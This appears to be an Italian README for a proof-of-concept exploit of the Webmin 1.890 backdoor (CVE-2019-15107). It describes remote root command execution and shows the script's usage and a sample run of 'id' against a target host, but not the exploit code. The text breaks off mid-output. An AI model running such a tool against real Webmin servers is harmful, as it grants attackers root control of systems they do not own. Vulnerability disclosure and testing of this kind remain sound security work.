
Exploit CVE-2019-15107
Webmin versione 1.890 è stata rilasciata con una backdoor che poteva permettere a chiunque ne fosse a conoscenza di eseguire comandi come root. Le versioni da 1.900 a 1.920 contenevano anch'esse una backdoor con codice simile, ma non era sfruttabile in un'installazione predefinita di Webmin. Solo se l'amministratore aveva abilitato la funzionalità in Webmin -> Configurazione Webmin -> Autenticazione per permettere la modifica delle password scadute, poteva essere utilizzata da un attaccante.
hai bisogno di pip3 per installare questo pacchetto.
$ python3 Webmin_exploit.py --help
usage: Webmin_exploit.py [-h] -host IP [-port Port] [-cmd Command]
Webmin 1.890 expired Remote Root POC
optional arguments:
-h, --help show this help message and exit
-host IP Host to attack
-port Port Port of the host ~ 10000 is Default
-cmd Command Command to execute ~ id is Default
python3 Webmin_exploit.py -host target -port 10000 -cmd id
$ python3 Webmin_exploit.py -host target -port 10000 -cmd id
[